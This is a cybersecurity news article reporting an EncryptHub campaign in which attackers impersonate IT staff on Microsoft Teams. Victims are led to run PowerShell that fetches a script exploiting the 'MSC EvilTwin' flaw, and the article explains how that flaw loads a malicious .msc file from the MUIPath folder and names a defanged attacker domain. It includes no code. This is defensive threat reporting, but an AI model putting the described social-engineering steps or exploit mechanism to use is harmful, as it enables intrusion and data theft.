BURSTA sophisticated social engineering campaign by the EncryptHub threat group that combines impersonation tactics with technical exploitation to compromise corporate networks.
The Russian-linked cybercriminals are posing as IT support staff and using Microsoft Teams requests to establish remote access, ultimately deploying malicious payloads through a previously unknown Windows vulnerability.
The attack begins with threat actors claiming to be from internal IT departments and sending Microsoft Teams connection requests to targeted employees.
Once victims accept the request and establish a remote session, the attackers guide them through executing PowerShell commands that appear legitimate but actually download and run malicious scripts.
The initial command executed bypasses Windows security policies and downloads a PowerShell script called “runner.ps1” from attacker-controlled domains such as cjhsbam[.]com.
This script is designed to exploit CVE-2025-26633, a vulnerability in Microsoft’s Management Console framework dubbed “MSC EvilTwin”.
Microsoft Teams Requests Drop Malware
The MSC EvilTwin vulnerability allows attackers to execute malicious Microsoft Console (.msc) files by manipulating how the system loads these administrative tools.
The exploit works by dropping two .msc files with identical names – one legitimate and one malicious – in different directories. When the legitimate file is executed, the system inadvertently loads the malicious version from an alternate location, specifically the MUIPath directory.
“The malicious file is placed in a different directory, specifically in MUIPath, typically in the en-US folder. When the legitimate msc file is run, it triggers the mmc[.]exe process.
Due to the MSC EvilTwin vulnerability, mmc.exe first checks for a file with the same name in the MUIPath directory,” explained Trustwave researchers.
After successful exploitation, the malware establishes persistence on infected machines and maintains continuous communication with command-and-control servers.
The system receives AES-encrypted commands that are decrypted locally and executed using PowerShell, granting attackers comprehensive remote control capabilities.
Among the payloads deployed is Fickle Stealer, a PowerShell-based information stealer designed to extract sensitive files, harvest system information, and steal cryptocurrency wallet data.
The malware also generates fake browser traffic to popular websites, helping disguise malicious command-and-control communications as normal network activity.
EncryptHub, also tracked as LARVA-208 and Water Gamayun, has been active since mid-2024 and represents a well-resourced Russian cybercriminal operation.
The group has compromised over 618 organizations worldwide as of February 2025, targeting sectors including Web3 developers and gaming platforms.
The threat actors have demonstrated sophisticated operational capabilities, including the abuse of legitimate platforms for malware distribution.
Researchers discovered that EncryptHub has been using Brave Support, the help platform for the Brave web browser, to host malicious ZIP archives containing their payloads.
This technique is particularly concerning as uploading files to Brave Support typically requires established accounts with upload permissions.
Beyond the initial Microsoft Teams social engineering, EncryptHub has developed an expanding arsenal of custom tools.
These include SilentCrystal, a Golang-compiled loader that mirrors PowerShell script functionality, and a SOCKS5 proxy backdoor that operates in both client and server modes.
The group has also created fake video conferencing platforms, such as RivaTalk, to lure victims into downloading malicious MSI installers. These platforms require access codes to download software, creating an additional layer of legitimacy while hindering security analysis.
CVE-2025-26633 was officially disclosed as a zero-day vulnerability in March 2025, though related attack samples were observed in the wild as early as February 2025. Microsoft has since released security patches, but the vulnerability continues to be actively exploited against unpatched systems.
The vulnerability carries a CVSS score of 7.0, indicating high severity, and has been added to the CISA Known Exploited Vulnerabilities catalog, underscoring its critical nature for federal agencies and enterprise environments.
The campaign highlights the persistent effectiveness of social engineering attacks combined with technical exploitation. “Social engineering remains one of the most effective tools in a cybercriminal’s arsenal, and the emerging threat group EncryptHub has hopped right on the bandwagon,” noted Trustwave researchers.
Cybersecurity experts recommend implementing multi-layered defense strategies, including immediate patching of CVE-2025-26633, enhanced monitoring of Microsoft Management Console activities, and comprehensive user awareness training focused on social engineering tactics.
Organizations should also restrict remote access capabilities and implement strict verification procedures for IT support interactions.
The EncryptHub campaign demonstrates how modern threat actors continue to evolve their tactics, combining trusted communication platforms like Microsoft Teams with sophisticated technical exploits to achieve their objectives.
IoCs
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
The post Hackers Mimic IT Teams to Exploit Microsoft Teams Request to Gain System Remote Access appeared first on Cyber Security News.